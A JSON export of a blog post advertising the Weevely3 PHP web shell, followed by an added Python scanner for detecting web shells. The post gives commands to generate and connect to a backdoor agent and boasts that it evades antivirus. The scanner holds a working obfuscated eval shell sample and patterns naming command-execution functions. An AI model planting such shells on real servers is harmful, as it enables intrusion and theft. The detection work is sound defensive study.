{"id":2589,"date":"2015-09-21T05:51:35","date_gmt":"2015-09-21T05:51:35","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2589"},"modified":"2015-09-21T05:51:35","modified_gmt":"2015-09-21T05:51:35","slug":"weevely3-weaponized-php-web-shell","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2589","title":{"rendered":"Weevely3 &#8211; Weaponized PHP Web Shell"},"content":{"rendered":"<p><strong>Weevely<\/strong> is a command line web shell, dynamically extended over the network at runtime, designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.<br \/>\nThe low footprint agent and over 30 modules form an extensible framework to administer the target, conduct a pen-test, post-exploit, and audit remote web access in order to escalate privileges and pivot deeper into internal networks.<br \/>\nThe weevely module ecosystem provides a working shell interface even when shell command execution is unavailable on the target, replacing the standard shell commands (file editors, cd and ls, an SQL CLI and dump tool, compression utilities, port scanners, etc.) with weevely modules.<br \/>\nThe weevely <a href=\"http:\/\/github.com\/epinna\/weevely3\/wiki\" target=\"_blank\" rel=\"noopener noreferrer\">wiki tutorials<\/a> show some examples of how to <a href=\"https:\/\/github.com\/epinna\/weevely3\/wiki\/Edit-db-and-code-of-a-web-app\" target=\"_blank\" rel=\"noopener noreferrer\">edit remote files<\/a>, <a href=\"https:\/\/github.com\/epinna\/weevely3\/wiki\/Harvest-other-users-credentials\" target=\"_blank\" rel=\"noopener noreferrer\">harvest and reuse SQL credentials<\/a> or <a href=\"https:\/\/github.com\/epinna\/weevely3\/wiki\/Bruteforce-SQL--credentials\" target=\"_blank\" rel=\"noopener noreferrer\">bruteforce<\/a> them. 
Anyone interested can also follow the tutorial on <a href=\"http:\/\/github.com\/epinna\/weevely3\/wiki\/developing-a-new-module\" target=\"_blank\" rel=\"noopener noreferrer\">developing new modules<\/a>.<br \/>\nWeevely can be extended to automate auditing or privilege escalation tasks, exploit specific vulnerabilities, enumerate accounts, scrape sensitive data, pivot on the target to scan internal networks, run HTTP or SQL requests, and do a whole lot of other cool stuff.<br \/>\nWeevely is installed by default on BackBox; download it now or get your copy of weevely <a href=\"https:\/\/github.com\/epinna\/weevely3\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a>.<br \/>\n<strong>Features:<\/strong><\/p>\n<ul>\n<li>Shell\/PHP telnet-like network terminal<\/li>\n<li>Auditing of common server misconfigurations<\/li>\n<li>SQL console pivoting on the target<\/li>\n<li>HTTP traffic proxying through the target<\/li>\n<li>Mount the target file system to a local mount point<\/li>\n<li>Conduct network scans pivoting on the target<\/li>\n<li>File upload and download<\/li>\n<li>Spawn reverse and direct TCP shells<\/li>\n<li>Bruteforce service accounts<\/li>\n<li>Compress and decompress zip, gzip, bzip2 and tar archives<\/li>\n<\/ul>\n<p><strong>The backdoor agent<\/strong><br \/>\nThe remote agent is a very low footprint PHP script that receives dynamically injected code from the client, extending the client's functionality over the network at run-time. The agent code is polymorphic (each generated agent differs), which makes it hard to detect with signature-based AV and HIDS. 
The communication is hidden inside ordinary-looking HTTP traffic and obfuscated using steganographic techniques.<br \/>\n<strong>Modules development<\/strong><br \/>\nWeevely also provides a Python API that can be used to develop your own modules: an internal audit, an account enumerator, a sensitive data scraper, a network scanner, modules that act as an HTTP or SQL client, and a whole lot of other cool stuff.<br \/>\n<strong>Installation<\/strong><br \/>\nFor Linux, the following example runs on Debian\/Ubuntu-derived environments with Python 2.7.<\/p>\n<pre># Make sure that the python package manager and yaml libraries are installed\nsudo apt-get install g++ python-pip libyaml-dev python-dev\n<\/pre>\n<p>Install the Python requirements:<\/p>\n<pre>sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade\n<\/pre>\n<p>Generate the backdoor agent. Running weevely.py without arguments prints the usage, including the generate command, which takes the agent password and the output path; the generated PHP file is then uploaded to the target web server:<\/p>\n<pre>\n .\/weevely.py \n[+] weevely 3.0\n[!] Error: too few arguments\n[+] Run terminal to the target\n    weevely <URL> <password>\n[+] Load session file\n    weevely session <path>\n[+] Generate backdoor agent\n    weevely generate <password> <path>\n<\/pre>\n<p>Connect to the agent using its URL and the password chosen at generation time:<\/p>\n<pre>\n  .\/weevely.py http:\/\/target\/agent.php mypassword\nweevely> \n<\/pre>\n<p><a href=\"https:\/\/github.com\/epinna\/weevely3\" target=\"_blank\" rel=\"noopener noreferrer\">Download Weevely3 at Github<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. 
The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a<\/p>\n","protected":false},"author":1,"featured_media":2590,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[171,431,278],"tags":[28,482,331],"class_list":["post-2589","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-backbox","category-vulnerability-analysis","category-web-application","tag-backdoor","tag-bruteforce","tag-shell"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2589"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2589\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2589"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2589"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
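The post describes the agent as polymorphic and hard to detect with signature-based AV and HIDS, which is the caveat a defender should take from it: a static signature taken from one generated agent will not match the next one. The following Python script is an added example, not part of the original post and not code from the weevely project. It scores PHP source on structural traits that PHP web shells in general share (a code-execution sink fed by request data, decoders, function names assembled from string fragments, opaque blobs). The indicator lists, weights, threshold and both sample files are constructed for illustration; they are not weevely signatures and a real deployment would tune them against the site's own code base.

```python
"""Heuristic scoring of PHP source for web-shell traits.

Added example, not part of the weevely project. Indicator lists, weights,
threshold and sample files are constructed for illustration.
"""
import re
from typing import Dict, List, Tuple

# Indicator classes: (label, regex). Generic web-shell traits, not a
# signature for any particular generated agent.
SINKS = [
    ("eval", r"\beval\s*\("),
    ("assert", r"\bassert\s*\("),
    ("create_function", r"\bcreate_function\s*\("),
    ("command exec", r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\("),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    ("preg_replace /e", r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"),
]
DECODERS = [
    ("decoder", r"\b(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\("),
]
SOURCES = [
    ("request input", r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    ("request header", r"\$_SERVER\s*\[\s*['\"]HTTP_"),
    ("raw body", r"php://input"),
]
OBFUSCATION = [
    # $f(...) calls a function whose name is only known at run time
    ("variable function call", r"\$[A-Za-z_]\w*\s*\("),
    # 'ba'.'se'.'64_'... hides a name from plain grep
    ("split string literal", r"(?:['\"][A-Za-z0-9_]{1,4}['\"]\s*\.\s*){3,}"),
    ("long opaque blob", r"['\"][A-Za-z0-9+/=]{80,}['\"]"),
]

WEIGHTS = {"sink": 3, "decoder": 2, "source": 1, "obfuscation": 2}
THRESHOLD = 6  # constructed; tune against the real code base


def _hits(patterns, text: str) -> List[str]:
    return [label for label, rx in patterns if re.search(rx, text)]


def score_php(src: str) -> Tuple[int, Dict[str, List[str]]]:
    """Return (score, findings by class) for one PHP source text."""
    findings = {
        "sink": _hits(SINKS, src),
        "decoder": _hits(DECODERS, src),
        "source": _hits(SOURCES, src),
        "obfuscation": _hits(OBFUSCATION, src),
    }
    score = sum(WEIGHTS[k] * len(v) for k, v in findings.items())
    # A code-execution sink reachable from request data is the web-shell
    # shape itself, whatever obfuscation hides the function names.
    if findings["sink"] and findings["source"]:
        score += 4
    return score, findings


def is_suspicious(src: str) -> bool:
    return score_php(src)[0] >= THRESHOLD


# Constructed sample: an ordinary page that echoes a query parameter safely.
BENIGN = r"""<?php
$name = isset($_GET['name']) ? $_GET['name'] : 'guest';
echo '<h1>Hello, ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</h1>';
"""

# Constructed sample of a minimal obfuscated agent: the decoder name is
# assembled from fragments so grepping for base64_decode finds nothing,
# and the payload arrives in a cookie or POST field.
SHELL = r"""<?php
$k = 'x9';
$d = 'ba' . 'se' . '64_' . 'dec' . 'ode';
$p = isset($_COOKIE[$k]) ? $_COOKIE[$k] : (isset($_POST[$k]) ? $_POST[$k] : '');
if ($p !== '') { eval($d($p)); }
"""


def scan(files: Dict[str, str]) -> Dict[str, Tuple[int, bool]]:
    """Score each (name -> source) pair; returns name -> (score, verdict)."""
    return {name: (score_php(src)[0], is_suspicious(src)) for name, src in files.items()}


if __name__ == "__main__":
    for name, (score, bad) in scan({"index.php": BENIGN, "agent.php": SHELL}).items():
        print(f"{name:12s} score={score:2d} {'SUSPICIOUS' if bad else 'ok'}")
        for cls, labels in score_php({"index.php": BENIGN, "agent.php": SHELL}[name])[1].items():
            if labels:
                print(f"    {cls}: {', '.join(labels)}")
```

The benign page also reads `$_GET`, so a "source" hit alone is worthless; the score only crosses the threshold when a sink is present, and the sink-plus-source bonus is what separates the agent from ordinary input handling. Run the script over a web root and review the top-scoring files by hand; the heuristics are a triage aid, not a verdict.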